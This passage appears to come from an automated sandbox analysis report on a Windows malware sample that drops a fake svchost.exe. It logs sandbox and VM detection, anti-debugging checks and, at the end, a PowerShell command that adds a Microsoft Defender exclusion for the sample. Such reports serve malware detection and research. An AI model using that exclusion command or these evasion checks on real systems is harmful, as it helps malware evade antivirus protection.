                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: a9YMw44iQq.exe, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeMemory allocated: 1A400000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\svchost.exeMemory allocated: 7B0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 3100000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 1B210000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: FD0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 1ABA0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: BC0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 28E0000 memory reserve | memory write watch
                      Source: C:\ProgramData\svchost.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599203Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598859Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598750Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598641Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598422Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598308Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598202Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598090Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597982Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597765Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597651Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597546Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597436Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWindow / User API: threadDelayed 1107Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWindow / User API: threadDelayed 8734Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6247Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3365Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7956Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1661Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6772Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2886Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8222
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1244
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -599094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598308s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598202s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -598090s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597982s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597651s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632Thread sleep time: -597436s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep count: 7956 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep count: 1661 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468Thread sleep count: 6772 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 2886 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280Thread sleep count: 8222 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280Thread sleep count: 1244 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 828Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\ProgramData\svchost.exe TID: 7060Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\ProgramData\svchost.exe TID: 5708Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\ProgramData\svchost.exe TID: 3856Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\ProgramData\svchost.exe TID: 5868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\ProgramData\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599203Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598859Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598750Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598641Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598422Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598308Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598202Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 598090Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597982Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597765Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597651Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597546Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeThread delayed: delay time: 597436Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe.0.drBinary or memory string: vmware
                      Source: a9YMw44iQq.exe, 00000000.00000002.3404316306.000000001B1F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD34887AD1 CheckRemoteDebuggerPresent,0_2_00007FFD34887AD1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\svchost.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\svchost.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
